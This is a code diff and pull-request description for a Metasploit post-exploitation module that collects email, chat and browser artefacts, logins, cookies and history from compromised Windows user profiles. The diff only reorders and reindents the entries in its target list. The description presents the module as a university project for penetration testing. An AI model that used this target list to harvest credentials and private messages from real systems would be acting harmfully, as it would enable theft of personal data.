       :description => "Outlook's sent emails"},
     ## Opera Mail
     {
-      :category => "emails",
       :application=> 'operamail',
+      :category => "emails",
       :filetypes => "logins",
       :path => 'AppData',
       :dir => 'Opera Mail',
@@ -159,8 +159,8 @@ class Metasploit3 < Msf::Post
       :artifact=> "*.msf",
       :description => "Postbox's sent and received emails"},
     {
-      :category => "emails",
       :application=> 'postbox',
+      :category => "emails",
       :filetypes => "email_logs",
       :path => 'AppData',
       :dir => 'Postbox',
@@ -175,8 +175,8 @@ class Metasploit3 < Msf::Post
       :artifact=> "Bulk Mail.msf",
       :description => "Postbox's junk emails"},
     {
-      :category => "emails",
       :application=> 'postbox',
+      :category => "emails",
       :filetypes => "draft_emails",
       :path => 'AppData',
       :dir => 'Postbox',
@@ -264,8 +264,8 @@ class Metasploit3 < Msf::Post
       :artifact=> "Sent",
       :description => "Thunderbird's Send emails"},
     {
-      :category => "emails",
       :application=> 'thunderbird',
+      :category => "emails",
       :filetypes => "deleted_emails",
       :path => 'AppData',
       :dir => 'Thunderbird',
@@ -280,8 +280,8 @@ class Metasploit3 < Msf::Post
       :artifact=> "Drafts",
       :description => "Thunderbird's unsent emails"},
     {
-      :category => "emails",
       :application=> 'thunderbird',
+      :category => "emails",
       :filetypes => "database",
       :path => 'AppData',
       :dir => 'Thunderbird',
@@ -326,7 +326,7 @@ class Metasploit3 < Msf::Post
     ## GaduGadu, popular Polish chat (Poland country)
     {
       :application=> 'gadugadu',
-     :category => "chats",
+      :category => "chats",
       :filetypes => "chat_logs",
       :path => 'GG dysk',
       :dir => 'Galeria',
@@ -413,7 +413,7 @@ class Metasploit3 < Msf::Post
     ## Tango - Texts and videos chat for mobiles and PCs
     {
       :application=> 'tango',
-     :category => "chats",
+      :category => "chats",
       :filetypes => "database",
       :path => 'LocalAppData',
       :dir => 'tango',
@@ -480,7 +480,7 @@ class Metasploit3 < Msf::Post
       :description => "Viber's Contact's profile images in Thumbs.db file"},
     {
       :application=> 'viber',
-     :category => "chats",
+      :category => "chats",
       :filetypes => "images",
       :path => 'AppData',
       :dir => 'ViberPC',
@@ -550,7 +550,7 @@ class Metasploit3 < Msf::Post
       :description => "Comodo's History"},
     {
       :application=> "comodo",
-     :category => "browsers",
+      :category => "browsers",
       :filetypes => "web_history",
       :path => 'LocalAppData',
       :dir =>'COMODO',


### PR DESCRIPTION
This post exploitation module has an extensive list of artefacts that it can gather from applications on end user systems.

Artefacts include: chat logins and logs, browser logins and history and cookies, email logins and emails sent and received and deleted, contacts, and many others. These artefacts are collected from applications including: 12 browsers, 13 chat/IM/IRC applications, 6 email clients, and 1 game.

The use case for this post-exploitation module is to specify the types of artefacts you are interested in, to gather the relevant files depending on your aims.

Show options illustrates the many kinds of information that can be selectively gathered.
![show options](https://cloud.githubusercontent.com/assets/670192/7865870/994ae65e-0563-11e5-8efb-74ac3933f23a.png)

So for example, to gather all database files from Viber:
![choose set options](https://cloud.githubusercontent.com/assets/670192/7865917/da0d7486-0563-11e5-8c4f-3b4229b5df02.png)

![choose](https://cloud.githubusercontent.com/assets/670192/7865891/b4f550c4-0563-11e5-8da2-9c016b1903d8.png)

Gathering everything is also an option:
![run_all](https://cloud.githubusercontent.com/assets/670192/7865897/c10e4e38-0563-11e5-89d0-216a157eafe5.png)
...
![end_all](https://cloud.githubusercontent.com/assets/670192/7865901/c8a551be-0563-11e5-8415-4f0ab23a62f6.png)

Loot!:
![saved to loot](https://cloud.githubusercontent.com/assets/670192/7865929/e385b42e-0563-11e5-8092-e3b6a31c8215.png)

This module was developed by Barwar Salim M for his final year project at Leeds Beckett University. Guidance, code clean-up and some additions by Z. Cliffe Schreuders.

We believe that this module will substantially increase the post-exploitation information gathering coverage for files of interest on end user systems.
